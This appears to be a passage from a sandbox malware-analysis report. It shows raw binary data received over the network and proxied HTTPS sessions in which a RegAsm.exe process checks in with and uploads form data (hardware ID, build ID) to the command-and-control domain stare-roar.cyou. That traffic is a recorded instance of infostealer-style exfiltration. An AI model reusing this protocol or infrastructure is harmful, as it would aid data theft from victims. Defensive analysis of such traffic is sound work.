Dec 11, 2024 10:45:00.402784109 CET	1236	IN	Data Raw: c4 04 85 c0 0f 84 61 02 00 00 b9 01 00 00 00 89 c3 c7 00 00 00 00 00 c7 40 04 06 00 00 00 89 48 08 e9 45 02 00 00 c7 45 08 00 00 00 00 55 e9 01 01 00 00 89 c7 8b 5c 24 14 50 e8 2d 82 00 00 83 c4 04 39 c3 0f 85 6a 02 00 00 8b 1e 0f b6 2b 55 e8 c7 Data Ascii: a@HEEU\$P-9j+UtC+UCuK<:5Ct$V@PWt$&.]SatE.]SMEuM,E.]S
Dec 11, 2024 10:45:00.403145075 CET	1236	IN	Data Raw: 75 c6 ff 34 24 ff 74 24 08 ff 74 24 30 e8 a6 7d 00 00 8b 4c 24 30 83 c4 0c 85 c0 75 ab 8b 41 10 8b 04 b8 85 c0 74 10 83 78 04 02 bf 00 00 00 00 75 07 8b 78 08 eb 02 31 ff 89 f8 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc cc 8b 4c 24 04 31 c0 85 c9 74 09 Data Ascii: u4$t$t$0}L$0uAtxux1^_[]L$1tyuAUSWV\$\|$,tWt$0tOV}t!1>tG9u$L$,y _D$sD$^_[]!AD$
Dec 11, 2024 10:45:00.403207064 CET	1236	IN	Data Raw: 24 10 8b 3c 82 83 ff ff 74 c3 8b 04 24 8b 40 08 39 34 b8 75 df 8b 04 24 8b 40 0c 8b 04 b8 89 44 24 0c 50 89 4c 24 0c e8 98 78 00 00 8b 4c 24 0c 83 c4 04 3b 44 24 04 75 bb ff 74 24 04 ff 74 24 10 55 e8 9d 78 00 00 8b 4c 24 14 83 c4 0c 85 c0 75 a2 Data Ascii: $<t$@94u$@D$PL$xL$;D$ut$t$UxL$u$@ot$t$1tyuAt$t$c1tyuAD$t@1L$1tT$9QvA
Dec 11, 2024 10:45:00.403219938 CET	1236	IN	Data Raw: 08 39 1c 82 75 da 8b 49 0c 8b 2c 81 55 e8 de 73 00 00 8b 4c 24 28 83 c4 04 3b 04 24 75 c2 ff 34 24 55 ff 74 24 30 e8 e5 73 00 00 8b 4c 24 30 83 c4 0c 85 c0 75 aa b8 ff ff ff ff eb 85 21 df 8b 41 04 89 44 24 04 eb 10 90 90 90 90 90 90 90 90 47 4e Data Ascii: 9uI,UsL$(;$u4$Ut$0sL$0u!AD$GN*#l$D$Q9uID$PjsL$(;$u4$t$t$0nsL$0uUSWV8L$,I sD$ L$(
Dec 11, 2024 10:45:00.403229952 CET	744	IN	Data Raw: f7 ff ff 77 32 89 c8 c1 e8 0c 24 0f 0c e0 88 06 89 c8 c1 e8 06 24 3f 0c 80 88 46 01 80 e1 3f 80 c9 80 88 4e 02 83 c6 02 b8 01 00 00 00 01 c3 83 c3 03 e9 e5 fe ff ff 81 f9 ff db 00 00 0f 87 02 01 00 00 80 7d 06 5c 0f 85 f8 00 00 00 80 7d 07 75 0f Data Ascii: w2$$?F?N}\}uL$T$L$T$$)!1)$?F?N$?F
Dec 11, 2024 10:45:00.404109001 CET	1236	IN	Data Raw: 4b 04 eb 02 89 c1 51 ff 15 00 40 44 00 83 c4 04 89 6b 04 89 7b 0c 89 f0 5e 5f 5b 5d c3 cc cc cc cc cc cc cc 55 53 57 56 83 ec 10 8b 6c 24 28 85 ed 0f 84 a3 01 00 00 8b 74 24 2c 8b 7c 24 24 89 f9 c1 e9 10 89 f8 0d ff ff 00 00 81 f7 00 00 ff ff 21 Data Ascii: KQ@Dk{^_[]USWVl$(t$,\|$$!xn^i)F$+D$t$qqi)i)+4$1$t$rr1DtD
Dec 11, 2024 10:45:00.404123068 CET	1236	IN	Data Raw: 57 56 8b 74 24 0c 8b 46 78 85 c0 74 0b 8b 8e 84 00 00 00 2b 4e 70 89 08 8b 46 7c 85 c0 74 43 8b 38 8b 86 8c 00 00 00 29 c7 8b 4e 58 8b 56 5c 39 d7 72 02 89 d7 03 46 74 01 f1 81 c1 72 92 03 00 57 51 50 e8 38 66 00 00 83 c4 0c 01 7e 58 29 7e 5c 03 Data Ascii: WVt$Fxt+NpF\|tC8)NXV\9rFtrWQP8f~X)~\F\|8~`t1~\1^_USWV@l$TD$0D$D$(rD$4jD$<2D$jUT$
Dec 11, 2024 10:45:00.404134035 CET	1236	IN	Data Raw: 38 8d 0c 07 0f b6 9c 0a 8f 00 00 00 88 5c 24 03 0f b6 8c 0a 90 00 00 00 88 4c 24 20 c7 44 24 08 00 00 00 00 89 fb 89 7c 24 14 b9 01 00 00 00 29 f1 89 4c 24 2c eb 1b 90 90 90 90 90 8b 4c 24 2c 41 89 4c 24 2c 83 f9 01 8b 7c 24 14 0f 84 6a 01 00 00 Data Ascii: 8\$L$ D$\|$)L$,L$,AL$,\|$jL$TYrVL$)9;t$TT$ 8uT$81^rL$)9T$ 8uT$81tR^r
Dec 11, 2024 10:45:00.522126913 CET	1236	IN	Data Raw: 89 df 89 75 2c 81 ff 01 02 00 00 0f 83 e3 fe ff ff 81 e1 ff 01 00 00 8d 89 6a 19 44 00 8b 54 24 04 0f b6 09 66 ff 84 4d d2 83 00 00 0f b7 8c 00 e4 1b 44 00 66 ff 84 4d 92 81 00 00 e9 29 ff ff ff c7 45 38 08 00 00 00 8b 55 28 8d 72 01 89 75 28 89 Data Ascii: u,jDT$fMDfM)E8U(ru(U,jDT$fMDfMEPD$D$TL$@^_[]USWVt$F

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49707	104.21.78.149	443	7688	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 09:45:03 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stare-roar.cyou
2024-12-11 09:45:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-11 09:45:04 UTC	1015	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 09:45:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c9nfsbcupftrjbbu94t23rj60r; expires=Sun, 06-Apr-2025 03:31:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SGih0A%2BTNnzwfVDV2PxYnpd9A1t%2BiKnqQL0i1R5i%2Bk6UhFqIEpuL6OCun9WAO9iAoZB0MxHjMJCYPuyTGkU6f%2BmG68JL%2F9iwApQfgcpByf79EYse1XRp4KfoJuxCIppTHFM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f048a27e9aa4216-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1568&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1800246&cwnd=250&unsent_bytes=0&cid=86763080e7900891&ts=713&x=0"
2024-12-11 09:45:04 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-11 09:45:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49708	104.21.78.149	443	7688	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 09:45:05 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: stare-roar.cyou
2024-12-11 09:45:05 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6928154717&j=
2024-12-11 09:45:06 UTC	1013	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 09:45:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q7603g35qb2huadqi3tjq669l5; expires=Sun, 06-Apr-2025 03:31:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y3evY4s6b4%2BpuBwsv3YS68udCSk8s3WpWZ5G%2Bc8NCqbf6Nk0JGJ6MnMlFeM8o0H6SOBxDQGAjw2ad2G17CCHM5wNWBK0z%2BpKu5Lclax1e6t8AsCQ06wIhDLuCrQ3iCHa%2FQo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f048a34abbb43b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1633&rtt_var=615&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=951&delivery_rate=1788120&cwnd=225&unsent_bytes=0&cid=ba487258ca33ef79&ts=729&x=0"
2024-12-11 09:45:06 UTC	356	IN	Data Raw: 34 64 39 0d 0a 53 6e 57 74 6c 38 78 37 70 6e 77 6b 33 31 77 31 58 31 32 31 61 71 78 53 46 42 72 35 43 6b 69 74 6c 61 61 58 61 44 54 78 4b 77 45 78 56 39 75 31 39 6b 2b 4b 58 6c 65 36 66 67 38 72 4c 38 41 50 67 48 42 31 66 74 73 77 4c 73 7a 35 31 66 4a 45 46 6f 64 47 49 33 41 54 7a 50 75 2f 48 6f 70 65 51 61 64 2b 44 77 51 6d 6c 77 2f 43 63 43 34 34 6e 47 41 71 7a 50 6e 45 39 67 4e 62 67 55 64 69 49 68 6e 4b 2f 36 6b 59 77 68 31 49 73 6a 6c 51 4f 6a 7a 66 42 4d 55 2f 66 48 66 62 4a 6d 72 49 37 34 53 74 53 6e 6d 55 58 32 41 48 46 4e 37 38 37 67 61 4b 42 77 61 36 4d 68 64 6c 66 39 51 50 7a 6a 35 79 66 70 4a 69 49 4d 58 78 78 66 4d 43 52 4a 68 4e 61 53 49 58 79 66 36 6a 45 64 59 51 51 72 55 79 56 6a 41 38 6c 30 61 4f 4e 32 34 34 77 79 68 35 2f 66 54 56 35 42 Data Ascii: 4d9SnWtl8x7pnwk31w1X121aqxSFBr5CkitlaaXaDTxKwExV9u19k+KXle6fg8rL8APgHB1ftswLsz51fJEFodGI3ATzPu/HopeQad+DwQmlw/CcC44nGAqzPnE9gNbgUdiIhnK/6kYwh1IsjlQOjzfBMU/fHfbJmrI74StSnmUX2AHFN787gaKBwa6Mhdlf9QPzj5yfpJiIMXxxfMCRJhNaSIXyf6jEdYQQrUyVjA8l0aON244wyh5/fTV5B
2024-12-11 09:45:06 UTC	892	IN	Data Raw: 4d 54 72 59 31 55 69 38 30 33 67 58 44 4d 48 74 79 6c 47 73 71 79 50 33 4f 2b 67 42 53 6e 6b 52 6c 4b 42 65 50 75 2b 34 65 33 46 34 65 2f 52 31 53 4c 54 6a 62 48 6f 77 4b 4e 6d 66 56 63 57 72 49 2b 34 53 74 53 6c 36 57 53 6d 41 6a 47 4d 7a 39 70 51 76 45 44 45 43 77 4f 30 55 37 4f 74 6b 43 7a 53 4a 38 64 70 31 72 49 38 54 2b 77 66 49 4f 46 74 30 4a 5a 44 42 58 6c 37 57 50 46 4d 38 53 54 4b 6f 2b 46 79 4a 78 7a 6b 6a 4a 50 44 59 67 32 32 77 72 79 2f 62 41 2b 77 52 53 6e 30 39 74 4a 52 6a 4a 2f 36 34 65 7a 68 5a 4f 76 44 4e 63 4d 6a 2f 53 42 63 6f 32 65 6e 6d 65 4b 47 53 50 38 4e 79 31 55 68 61 39 54 6d 41 36 56 66 72 32 6f 42 66 44 43 41 61 69 63 45 35 39 4f 4e 74 49 6c 6e 42 34 66 5a 52 36 4b 39 33 79 79 75 63 47 55 35 56 45 59 43 59 58 79 76 4b 6a 46 38 Data Ascii: MTrY1Ui803gXDMHtylGsqyP3O+gBSnkRlKBePu+4e3F4e/R1SLTjbHowKNmfVcWrI+4StSl6WSmAjGMz9pQvEDECwO0U7OtkCzSJ8dp1rI8T+wfIOFt0JZDBXl7WPFM8STKo+FyJxzkjJPDYg22wry/bA+wRSn09tJRjJ/64ezhZOvDNcMj/SBco2enmeKGSP8Ny1Uha9TmA6Vfr2oBfDCAaicE59ONtIlnB4fZR6K93yyucGU5VEYCYXyvKjF8
2024-12-11 09:45:06 UTC	1369	IN	Data Raw: 34 34 34 33 0d 0a 76 61 75 45 38 6f 52 54 4c 55 32 56 7a 41 2b 33 41 44 49 50 58 31 33 6c 47 38 69 7a 50 76 42 2b 41 6b 57 33 51 6c 6b 4d 46 65 58 74 59 73 58 78 77 39 58 2f 77 74 55 4d 7a 48 51 48 6f 34 76 4f 47 48 62 62 79 61 50 72 34 54 2f 44 56 47 58 52 47 6b 72 45 38 76 34 6f 52 44 4e 46 31 53 33 4d 6c 6b 76 4d 74 30 4e 77 44 78 7a 64 35 74 70 4b 38 48 39 7a 37 56 45 46 70 52 52 49 33 42 58 34 50 69 2b 43 38 34 56 56 2f 38 4c 56 44 4d 78 30 42 36 4f 4c 7a 68 68 32 32 38 6d 6a 36 2b 45 2f 67 78 61 6e 30 6c 6c 4f 68 6e 41 35 36 51 4c 77 42 42 43 73 54 42 65 4d 44 44 53 47 73 6f 77 5a 48 6d 65 62 79 54 43 35 63 47 31 52 42 61 55 55 53 4e 77 56 2f 58 42 71 51 6e 56 47 51 53 49 50 56 6b 7a 4f 4d 46 49 30 58 35 76 4f 4a 78 6b 61 70 65 33 78 2f 6b 48 58 35 Data Ascii: 4443vauE8oRTLU2VzA+3ADIPX13lG8izPvB+AkW3QlkMFeXtYsXxw9X/wtUMzHQHo4vOGHbbyaPr4T/DVGXRGkrE8v4oRDNF1S3MlkvMt0NwDxzd5tpK8H9z7VEFpRRI3BX4Pi+C84VV/8LVDMx0B6OLzhh228mj6+E/gxan0llOhnA56QLwBBCsTBeMDDSGsowZHmebyTC5cG1RBaUUSNwV/XBqQnVGQSIPVkzOMFI0X5vOJxkape3x/kHX5
2024-12-11 09:45:06 UTC	1369	IN	Data Raw: 56 35 65 31 70 41 76 42 45 45 4b 33 4f 31 4d 78 4e 64 63 4e 33 44 68 77 66 35 64 67 4c 38 44 78 77 66 67 4e 58 5a 42 62 63 53 73 54 77 66 6e 75 56 34 51 5a 58 76 31 6d 46 78 67 6f 31 42 6a 49 4d 7a 5a 6e 31 58 46 71 79 50 75 45 72 55 70 57 6e 55 56 6f 4c 78 7a 45 38 61 6f 5a 79 52 56 49 73 7a 64 62 4e 54 50 51 47 73 4d 31 66 6e 4b 53 62 53 62 43 39 4e 62 32 43 78 62 64 43 57 51 77 56 35 65 31 69 53 72 7a 50 51 61 69 63 45 35 39 4f 4e 74 49 6c 6e 42 33 63 4a 78 6d 4c 74 33 35 31 76 73 4e 56 70 56 42 61 79 38 62 77 66 75 38 45 63 55 65 53 4c 49 32 58 6a 6b 2b 30 77 7a 43 4e 7a 59 32 32 32 38 79 6a 36 2b 45 33 51 6c 4d 69 51 74 4e 49 78 66 49 35 62 67 43 68 41 45 49 70 48 35 51 4d 58 2b 50 53 4d 6f 37 66 48 47 59 59 53 37 43 39 38 33 36 41 31 36 65 51 58 45 Data Ascii: V5e1pAvBEEK3O1MxNdcN3Dhwf5dgL8DxwfgNXZBbcSsTwfnuV4QZXv1mFxgo1BjIMzZn1XFqyPuErUpWnUVoLxzE8aoZyRVIszdbNTPQGsM1fnKSbSbC9Nb2CxbdCWQwV5e1iSrzPQaicE59ONtIlnB3cJxmLt351vsNVpVBay8bwfu8EcUeSLI2Xjk+0wzCNzY2228yj6+E3QlMiQtNIxfI5bgChAEIpH5QMX+PSMo7fHGYYS7C9836A16eQXE
2024-12-11 09:45:06 UTC	1369	IN	Data Raw: 4c 77 65 79 42 52 4a 76 6a 5a 61 50 6a 66 46 43 4d 4d 77 5a 47 71 64 59 79 53 50 75 59 54 79 45 68 62 4c 43 56 49 2f 48 49 2f 71 34 41 43 45 47 55 72 39 5a 68 63 2b 4e 64 6f 47 33 44 52 77 63 35 68 6d 49 73 72 2f 77 50 38 48 57 5a 68 44 61 69 41 58 77 50 43 6d 45 73 49 51 52 37 73 79 57 6e 31 78 6c 77 2f 57 63 43 34 34 76 48 49 6e 79 65 44 56 77 41 31 57 77 67 6c 38 5a 67 36 50 38 71 4a 5a 6e 46 35 4c 73 54 52 61 4f 44 76 66 44 38 30 78 65 6e 79 57 5a 53 37 47 38 38 48 6e 47 46 43 64 53 57 77 6d 47 4d 50 6e 6f 42 7a 45 45 67 62 7a 66 6c 41 6c 66 34 39 49 2f 79 64 32 4f 49 51 6d 4d 34 2f 77 79 4c 56 53 46 70 78 45 63 53 51 59 7a 2f 53 74 48 63 38 5a 51 4c 73 2f 56 44 67 38 30 67 37 50 4d 48 70 79 6e 47 41 67 77 66 72 43 38 51 78 51 30 77 63 6a 4c 77 2b 50 Data Ascii: LweyBRJvjZaPjfFCMMwZGqdYySPuYTyEhbLCVI/HI/q4ACEGUr9Zhc+NdoG3DRwc5hmIsr/wP8HWZhDaiAXwPCmEsIQR7syWn1xlw/WcC44vHInyeDVwA1Wwgl8Zg6P8qJZnF5LsTRaODvfD80xenyWZS7G88HnGFCdSWwmGMPnoBzEEgbzflAlf49I/yd2OIQmM4/wyLVSFpxEcSQYz/StHc8ZQLs/VDg80g7PMHpynGAgwfrC8QxQ0wcjLw+P
2024-12-11 09:45:06 UTC	1369	IN	Data Raw: 41 51 51 72 6f 2b 57 7a 49 34 33 77 66 4b 4d 48 6b 34 31 53 67 74 31 37 65 63 74 53 70 64 68 57 68 74 49 77 57 50 36 75 41 41 68 42 6c 4b 2f 57 59 58 4d 7a 62 57 41 4d 41 38 66 6e 79 4a 61 43 48 47 2b 4d 58 36 43 6c 57 53 51 32 73 36 45 63 2f 2b 70 68 37 4d 47 6b 69 76 50 31 68 39 63 5a 63 50 31 6e 41 75 4f 4b 70 2b 4c 63 6a 34 68 74 77 4e 54 5a 4a 44 59 43 4d 62 6a 2b 72 67 41 49 51 5a 53 76 31 6d 46 7a 41 7a 32 67 7a 63 50 48 5a 34 6b 6d 38 67 33 66 6a 4c 2b 41 6c 57 6c 6c 74 69 4f 68 6a 45 38 4b 30 64 79 78 46 4b 74 54 51 58 63 33 2f 51 45 49 35 6f 4e 6c 53 59 65 53 43 4e 30 4e 37 6a 44 56 71 43 51 6d 34 6b 56 39 43 37 74 31 6e 44 45 67 62 6c 66 6c 63 38 4d 73 55 4e 7a 7a 70 38 64 5a 4e 6e 4c 38 72 34 77 50 45 42 57 49 46 48 62 43 67 52 78 50 53 72 47 Data Ascii: AQQro+WzI43wfKMHk41Sgt17ectSpdhWhtIwWP6uAAhBlK/WYXMzbWAMA8fnyJaCHG+MX6ClWSQ2s6Ec/+ph7MGkivP1h9cZcP1nAuOKp+Lcj4htwNTZJDYCMbj+rgAIQZSv1mFzAz2gzcPHZ4km8g3fjL+AlWlltiOhjE8K0dyxFKtTQXc3/QEI5oNlSYeSCN0N7jDVqCQm4kV9C7t1nDEgblflc8MsUNzzp8dZNnL8r4wPEBWIFHbCgRxPSrG
2024-12-11 09:45:06 UTC	1369	IN	Data Raw: 7a 4d 31 77 35 4e 74 49 41 7a 54 56 7a 63 70 64 6b 4b 38 66 2b 7a 76 41 50 55 4a 6c 4b 62 53 63 57 77 2f 47 6e 46 38 31 65 43 50 30 35 54 33 31 6e 6c 7a 37 65 4e 32 35 31 69 79 6f 59 7a 4f 62 56 34 41 64 47 6c 51 74 4d 4b 78 76 4d 38 4b 6b 4a 68 41 45 49 70 48 35 51 4d 58 2b 50 53 4d 34 30 65 6e 75 63 5a 69 58 43 2b 4d 50 2b 42 56 79 64 57 32 77 74 48 38 50 39 6f 77 76 4f 46 46 53 30 4e 31 6f 7a 4e 38 55 4c 6a 6e 34 32 66 34 4d 6f 63 6f 2f 46 7a 76 59 47 51 4a 35 47 49 7a 64 5a 31 72 57 70 46 59 52 47 42 71 38 73 56 7a 59 2f 30 41 62 63 4d 58 35 33 6b 57 67 73 78 50 33 48 2f 41 35 59 6d 6b 39 69 4a 52 62 4f 39 61 73 5a 7a 51 78 4c 2f 58 41 58 4f 69 65 58 55 49 34 48 65 6e 4f 71 61 7a 79 50 36 49 72 73 53 6c 47 66 43 54 74 6f 46 74 33 34 70 68 33 45 45 30 Data Ascii: zM1w5NtIAzTVzcpdkK8f+zvAPUJlKbScWw/GnF81eCP05T31nlz7eN251iyoYzObV4AdGlQtMKxvM8KkJhAEIpH5QMX+PSM40enucZiXC+MP+BVydW2wtH8P9owvOFFS0N1ozN8ULjn42f4Moco/FzvYGQJ5GIzdZ1rWpFYRGBq8sVzY/0AbcMX53kWgsxP3H/A5Ymk9iJRbO9asZzQxL/XAXOieXUI4HenOqazyP6IrsSlGfCTtoFt34ph3EE0
2024-12-11 09:45:06 UTC	1369	IN	Data Raw: 5a 57 32 5a 53 4e 78 77 4c 6a 6a 63 61 7a 6a 64 38 63 66 6a 43 52 47 74 64 30 4d 6a 41 63 37 34 70 52 58 36 49 46 4f 2b 4d 46 6b 36 4b 63 5a 49 67 48 42 35 4f 4d 4e 52 61 6f 65 33 2b 37 74 4b 54 74 4d 52 49 78 30 55 77 66 75 70 44 39 56 54 5a 72 59 6f 56 6a 41 30 32 30 72 50 50 57 5a 2f 32 79 5a 71 79 62 65 63 70 55 51 57 6c 31 67 6a 63 45 65 64 72 76 74 4b 6b 30 34 55 6f 6e 42 4f 66 53 6d 58 55 4a 78 2b 4e 6d 72 62 4d 47 71 49 39 4e 62 6e 44 46 57 46 53 69 51 57 4b 65 2f 2b 6f 68 72 49 48 30 48 39 63 42 63 79 66 34 38 78 6a 6a 4e 6b 61 74 52 35 50 4d 4c 6e 77 37 6b 43 52 35 35 46 49 32 5a 58 67 2f 47 6c 46 63 45 5a 56 76 49 73 52 7a 59 7a 77 55 54 4b 49 6a 59 32 32 33 6b 68 77 4f 58 4b 38 6b 56 48 68 55 52 7a 4b 78 4c 49 75 61 59 49 79 52 49 47 38 33 35 Data Ascii: ZW2ZSNxwLjjcazjd8cfjCRGtd0MjAc74pRX6IFO+MFk6KcZIgHB5OMNRaoe3+7tKTtMRIx0UwfupD9VTZrYoVjA020rPPWZ/2yZqybecpUQWl1gjcEedrvtKk04UonBOfSmXUJx+NmrbMGqI9NbnDFWFSiQWKe/+ohrIH0H9cBcyf48xjjNkatR5PMLnw7kCR55FI2ZXg/GlFcEZVvIsRzYzwUTKIjY223khwOXK8kVHhURzKxLIuaYIyRIG835
2024-12-11 09:45:06 UTC	1369	IN	Data Raw: 6b 6a 66 4f 6e 45 30 30 79 51 37 33 50 6e 50 34 77 30 57 72 41 63 6a 4d 46 65 58 74 5a 73 61 79 68 42 42 71 79 38 61 47 7a 7a 51 44 73 30 2b 59 57 6e 62 4a 6d 72 4a 74 35 79 6e 52 42 61 58 57 43 4e 77 52 35 32 75 2b 30 71 54 54 68 53 69 63 45 35 39 4b 5a 64 51 6e 58 34 32 61 74 73 77 61 6f 6a 35 79 66 51 4a 57 4a 42 62 63 53 34 55 32 66 62 70 4a 2f 6f 37 53 37 41 37 57 54 6f 42 36 53 6e 45 49 48 74 33 6e 46 59 55 2b 4f 62 44 35 55 68 77 6b 46 39 67 61 46 6d 50 37 65 35 42 68 44 39 4d 72 54 4e 59 4f 6e 2b 5a 53 4d 70 77 4c 6a 69 2b 5a 53 66 4b 2b 63 4f 33 4b 31 79 44 52 47 77 76 56 34 47 31 6f 6c 6d 63 58 6b 65 33 4c 6c 6f 79 4f 4a 73 50 31 44 63 32 4e 74 74 6d 61 70 65 33 78 66 38 61 57 35 78 4f 4c 79 34 5a 77 62 57 78 56 39 31 65 55 50 31 6d 42 48 4e 2f Data Ascii: kjfOnE00yQ73PnP4w0WrAcjMFeXtZsayhBBqy8aGzzQDs0+YWnbJmrJt5ynRBaXWCNwR52u+0qTThSicE59KZdQnX42atswaoj5yfQJWJBbcS4U2fbpJ/o7S7A7WToB6SnEIHt3nFYU+ObD5UhwkF9gaFmP7e5BhD9MrTNYOn+ZSMpwLji+ZSfK+cO3K1yDRGwvV4G1olmcXke3LloyOJsP1Dc2Nttmape3xf8aW5xOLy4ZwbWxV91eUP1mBHN/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49709	104.21.78.149	443	7688	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 09:45:07 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IZCLLOR8VQOQVJHGT9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12851 Host: stare-roar.cyou
2024-12-11 09:45:07 UTC	12851	OUT	Data Raw: 2d 2d 49 5a 43 4c 4c 4f 52 38 56 51 4f 51 56 4a 48 47 54 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 45 41 46 36 45 33 41 32 43 35 33 37 37 32 35 39 43 34 31 31 45 30 36 46 36 32 46 36 35 43 0d 0a 2d 2d 49 5a 43 4c 4c 4f 52 38 56 51 4f 51 56 4a 48 47 54 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 5a 43 4c 4c 4f 52 38 56 51 4f 51 56 4a 48 47 54 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 Data Ascii: --IZCLLOR8VQOQVJHGT9Content-Disposition: form-data; name="hwid"58EAF6E3A2C5377259C411E06F62F65C--IZCLLOR8VQOQVJHGT9Content-Disposition: form-data; name="pid"2--IZCLLOR8VQOQVJHGT9Content-Disposition: form-data; name="lid"yau6Na--69281
2024-12-11 09:45:08 UTC	1019	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 09:45:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h60uors46l9oero1idfuedi56s; expires=Sun, 06-Apr-2025 03:31:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1hp10haILxGmULytucW%2BmrcXSq2nZhPL5k6ZWqNTnDLY1mx8QbR5WVhjo4%2FOpi22lMrpPSktRp855i05eYAOME0%2F5N60fr1cIGc%2BKfLcJlLwZALmsePmoqA0p%2F4amEXYA1E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f048a41788f4302-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1687&rtt_var=820&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13790&delivery_rate=1730883&cwnd=252&unsent_bytes=0&cid=cc790e4781b2e79c&ts=698&x=0"
2024-12-11 09:45:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-11 09:45:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49710	104.21.78.149	443	7688	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 09:45:09 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=AY68WG3LV3AIH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15050 Host: stare-roar.cyou
